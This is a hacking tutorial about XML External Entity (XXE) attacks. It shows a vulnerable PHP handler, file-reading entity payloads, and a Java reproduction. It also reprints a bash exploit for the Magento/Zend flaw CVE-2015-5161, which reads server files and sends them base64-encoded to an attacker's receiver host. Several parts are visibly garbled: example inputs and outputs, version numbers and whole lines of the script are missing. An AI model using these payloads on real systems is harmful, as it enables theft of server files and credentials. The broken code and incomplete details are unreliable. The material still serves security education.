How to hack #4 – XML External Entity Processing


Today, we still pick XML over JSON because old, legacy applications support communication only via XML (for example SOAP), or because XML Schema is much more mature than JSON Schema or Swagger. Or you like XML or… you use Java! Anyway, regardless of the reason for your decision, using this standard may be dangerous, and today I want to show you one of the attacks, called XML External Entity Processing (XXE).

Simple example

Let’s say we allow users to upload an XML file similar to the one below


Our script which handles the XML file is:

$xml = $_POST['xml'];
$xml = simplexml_load_string($xml, SimpleXMLElement::class, LIBXML_NOXMLDECL);
// do some stuff
echo 'You just imported product: '.$xml->children().'?';

Very simple, isn’t it? We just get the input, parse it and display the product’s name. What can go wrong? Let’s take a step back and look at XML entities. There are 3 types of XML entity declarations: internal (parsed), external (parsed) and external (unparsed). We are interested in external parsed entities, because the parser loads their content and inserts it into the document.

A very simple entity declaration is shown below

<?xml version="1.0" standalone="yes" ?>
<!DOCTYPE author [
  <!ENTITY my_name "James Bond">
]>
<author>&my_name;</author>

Simplifying, entities are like variables. We can put static text there or load it from some other source. What can the source be? Any file reachable over the network or any file on the local filesystem. Can you see what I am going to do?
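
To make the "variables" analogy concrete, here is a minimal Java sketch. It assumes the JDK's built-in DOM parser with its default settings; the class name `EntityDemo` and the helper `rootText` are made up for illustration. It parses a document that declares an internal entity and prints the root element's text after the parser has expanded the reference.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class EntityDemo {
    // Parses the XML with the default DOM parser and returns the root element's text.
    static String rootText(String xml) {
        try {
            DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();
            Document doc = builder.parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getDocumentElement().getTextContent();
        } catch (ParserConfigurationException | SAXException | IOException e) {
            throw new IllegalArgumentException("could not parse XML", e);
        }
    }

    public static void main(String[] args) {
        String xml =
                "<?xml version=\"1.0\" standalone=\"yes\" ?>\n" +
                "<!DOCTYPE author [\n" +
                "  <!ENTITY my_name \"James Bond\">\n" +
                "]>\n" +
                "<author>&my_name;</author>";
        // The reference &my_name; is replaced by the entity's value.
        System.out.println(rootText(xml)); // prints "James Bond"
    }
}
```

The document never contains the text "James Bond" inside the element itself; the parser substitutes it. An external entity works the same way, except that the value comes from wherever the SYSTEM identifier points.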

We have an application which handles the XML we provide and displays the name of the product that was just imported. Let’s try to read its configuration. The configuration file is called config.ini. To load any file on the filesystem that the script has access to, we can use the syntax below

<!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "some_file.txt" >]>

Thanks to the SYSTEM keyword, you can read any file the script can access. First, let’s try to load the configuration file. The complete XML is below:

<!DOCTYPE foo [ <!ELEMENT foo ANY >
   <!ENTITY xxe SYSTEM "some_file.txt" >]>


In my case, the script returns output as below:

Cool, isn’t it?! And that’s not all, because we can read ANY file the web server has access to.

If the “expect” module is installed in PHP, you can even get RCE (Remote Code Execution), which opens up many more attack vectors and can give you full control over the application.

Moreover, we can reproduce the same vulnerability in other languages like Java:

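import org.w3c.dom.*;
import org.xml.sax.SAXException;

import javax.xml.parsers.*;
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;

public class XeeMain {
    public static void main(String[] args) throws ParserConfigurationException, IOException, SAXException {
        // Default factory settings: DOCTYPE declarations and external entities are allowed
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();

        StringBuilder xmlStringBuilder = new StringBuilder();
        xmlStringBuilder.append("<!DOCTYPE foo [ <!ELEMENT foo ANY >\n" +
                "   <!ENTITY xxe SYSTEM \"/etc/hosts\" >]>\n" +
                // The root element references the entity, so its content comes from /etc/hosts
                "<foo>&xxe;</foo>");

        ByteArrayInputStream input =  new ByteArrayInputStream(
                xmlStringBuilder.toString().getBytes(StandardCharsets.UTF_8));
        Document doc = builder.parse(input);

        System.out.println("Product name:");
        System.out.println(doc.getDocumentElement().getTextContent());
    }
}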

So no one can sleep peacefully today…
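
For Java at least, a commonly recommended way to shut this door is to refuse DOCTYPE declarations altogether. The sketch below assumes the JDK's built-in parser, which supports the `disallow-doctype-decl` feature; the class name `SafeXmlParser` and the helper `accepts` are hypothetical names used only for this illustration. It is a sketch of the idea, not a complete hardening guide.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXException;
import org.xml.sax.helpers.DefaultHandler;

public class SafeXmlParser {
    // Builds a factory that refuses any document containing a DOCTYPE declaration.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        return factory;
    }

    // Returns true if the hardened parser accepts the document, false if it rejects it.
    static boolean accepts(String xml) {
        try {
            DocumentBuilder builder = hardenedFactory().newDocumentBuilder();
            // DefaultHandler rethrows fatal errors without printing them to stderr.
            builder.setErrorHandler(new DefaultHandler());
            builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return true;
        } catch (SAXException e) {
            return false; // the document was rejected (here: because of its DOCTYPE)
        } catch (IOException | ParserConfigurationException e) {
            throw new IllegalStateException(e);
        }
    }

    public static void main(String[] args) {
        String attack = "<!DOCTYPE foo [ <!ELEMENT foo ANY >\n" +
                "   <!ENTITY xxe SYSTEM \"/etc/hosts\" >]>\n" +
                "<foo>&xxe;</foo>";
        System.out.println(accepts(attack));             // prints "false"
        System.out.println(accepts("<foo>Chair</foo>")); // prints "true"
    }
}
```

Because the parser stops at the DOCTYPE declaration, the entity is never resolved and `/etc/hosts` is never opened. The trade-off is that legitimate documents relying on a DTD are rejected as well.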

Some real vulnerabilities


Do you know Magento? Magento is one of the most popular e-commerce platforms written in PHP, with thousands of downloads. Magento uses Zend Framework (ZF) as its main library, which provides lots of useful libraries and classes. Unfortunately, a vulnerability was found in the ZF Xml component, which affected Magento CE <= and Magento EE <=. The vulnerability was found in ZendFramework-1.12.13/library/Zend/Xml/Security.php and ZendFramework-2.4.2/library/ZendXml/Security.php. The whole exploit can be found below:

# POC Exploit (v1.1)
# eBay Magento CE  <=  XML eXternal Entity Injection (XXE) on PHP-FPM
# eBay Magento EE  <=
# CVE-2015-5161
# Credits:
# Dawid Golunski
# dawid (at)
# Advisories:
# Usage:
# [Vulnerability test]
# This is to test the vulnerability with a simple XXE payload which retrieves the
# /dev/random file and causes a time out. No receiver server is required in this
# test as no data is returned.
# Run the script with just the URL to Magento SOAP API, with no other parameters. 
# E.g:
# ./ http://apache-phpfpm/magento/index.php/api/soap/index
# [File retrieval from the remote server]
# E.g:
# ./ http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 80
# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:
# You should have the receiver server/script listening on the specified port before running this exploit.
if [ $# -ne 1 ] && [ $# -ne 4 ] ; then 
  echo -e "\nUsage: \n"
  echo -e "[Vulnerability test]\n"
  echo -e "$0 MAGENTO_SOAP_API_URL"
  echo -e "E.g:"
  echo -e "$0 http://fpmserver/magento/index.php/api/soap/index\n";
  echo -e "[File retrieval]\n"
  echo -e "E.g:"
  echo -e "$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 80\n";
  exit 2;
if [ $# -eq 4 ]; then 
if [ $TEST_ONLY -eq 1 ]; then 
  # Vulnerability test 
  # Perform only a test by reading /dev/random file
  TEST_PAYLOAD_XML='<?xml version="1.0" encoding="UTF-16"?>
  <!DOCTYPE foo [  
  <!ENTITY % xxe SYSTEM "file:///dev/random" >
  echo "$TEST_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
  echo -e "Target URL: $TARGETURL\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n"
  # Fetching /dev/random should cause the remote script to block
  # on reading /dev/random until the script times out.
  # If there is no delay it means the remote script is not vulnerable or 
  # /dev/random is not accessible.
  START=$(date +%s)
  wget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE
  END=$(date +%s)
  DIFF=$(expr $END \- $START )
  if [ $DIFF -eq $TIMEOUT ]; then
    echo "Vulnerable. No response from Magento for $DIFF seconds :)"
    exit 0
    echo "Not vulnerable, or there is no /dev/random on the remote server ;)"
    exit 1
  # File retrieval XXE payload
  SEND_DTD="<?xml version=\"1.0\" encoding=\"UTF-8\"?>
  <!ENTITY % all \"<!ENTITY &#37; send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\">
  SEND_DTD_B64="`echo "$SEND_DTD" | base64 -w0`"
  FILE_PAYLOAD_XML="<?xml version=\"1.0\" encoding=\"UTF-16\"?>
  <!DOCTYPE foo [  
  <!ENTITY % file SYSTEM \"php://filter/convert.base64-encode/resource=$FILE\">
  <!ENTITY % dtd SYSTEM \"data://text/plain;base64,$SEND_DTD_B64\">
  # Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT
  echo "$FILE_PAYLOAD_XML" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE
  echo -e "Target URL: $TARGETURL\n\nInjecting XXE payload to retrieve the $FILE file..."
  echo -e "If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\n"
  echo -e "If in doubt, try the vulnerability test option.\n"
  wget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE


The author of the CVE-2015-5161 advisory wrote:

As we can see from the code, the application disables the entity loader (via libxml_disable_entity_loader), it also disables network access (LIBXML_NONET), and it additionally scans provided XML for the presence of XML entities to prevent potential entity expansion attacks. The code succesfully prevents most XXE attacks. However, as the PHP libxml_disable_entity_loader() function was reported not thread safe (the entity loader setting could potentially get overwritten between hits in FPM processes), Zend Framework does not use it when the application is hosted in a PHP-FPM environment. Instead, another approach is taken to prevent the XXE attacks.

It is worth stressing that all libraries or applications which use this ZF component were affected.
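
Note that the exploit above pipes its payloads through `iconv -f UTF-8 -t UTF-16`. One plausible reason, sketched below in Java, is that a scan looking for the ASCII bytes `<!ENTITY` no longer matches once the same document is encoded as UTF-16. The class `NaiveEntityScan` and its method `looksDangerous` are hypothetical, simplified stand-ins for such a scan and are not Zend Framework's actual code.

```java
import java.nio.charset.StandardCharsets;

public class NaiveEntityScan {
    // Hypothetical filter: flags input whose raw bytes contain the ASCII sequence "<!ENTITY".
    static boolean looksDangerous(byte[] rawXml) {
        // ISO-8859-1 maps every byte to exactly one char, so this is a byte-level search.
        return new String(rawXml, StandardCharsets.ISO_8859_1).contains("<!ENTITY");
    }

    public static void main(String[] args) {
        String payload = "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"some_file.txt\" >]>"
                + "<foo>&xxe;</foo>";

        // Same document, two encodings.
        byte[] utf8 = payload.getBytes(StandardCharsets.UTF_8);
        byte[] utf16 = payload.getBytes(StandardCharsets.UTF_16);

        System.out.println(looksDangerous(utf8));  // prints "true"
        System.out.println(looksDangerous(utf16)); // prints "false"
    }
}
```

In UTF-16 every ASCII character is stored as two bytes, so the characters of `<!ENTITY` are separated by zero bytes and the byte-level search misses them, while an XML parser that honours the declared encoding still sees the entity declaration.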

Google AdWords API

Another problem was found in Google AdWords API. What is it? “The AdWords API allows apps to interact directly with the AdWords platform, vastly increasing the efficiency of managing large or complex AdWords accounts and campaigns”.

For security reasons, Google AdWords API can only be accessed via HTTPS. However, the code below does not set appropriate SSL settings on the https:// stream context. It fails to assign a Certificate Authority (CA) and to turn the verify_peer option on. It uses stream_context_get_default() to get the default context, which on all PHP versions below PHP 5.6.x does not validate the CA by default. Because of this, applications using the AdWords API library may be tricked into retrieving data from untrusted sources pretending to be

The vulnerability was found in the code below:

  protected function loadWsdl($wsdlUri, $proxy = null) {
    // Set proxy.
    if ($proxy) {
      $opts = array(
          'http' => array(
              'proxy' => $proxy,
              'request_fulluri' => true
          )
      );
      $context = stream_context_get_default($opts);
    }
    $this->dom = new DOMDocument();
    $this->serviceNamespace =

To exploit the application, you have to combine it with another attack called Man In The Middle.


XML is still very popular, and JSON or YAML are not about to displace it. However, (as always) we need to be careful with it, because an attack can come from almost any direction. Do you know any other ways to attack XML formats or parsers? Share them in the comments!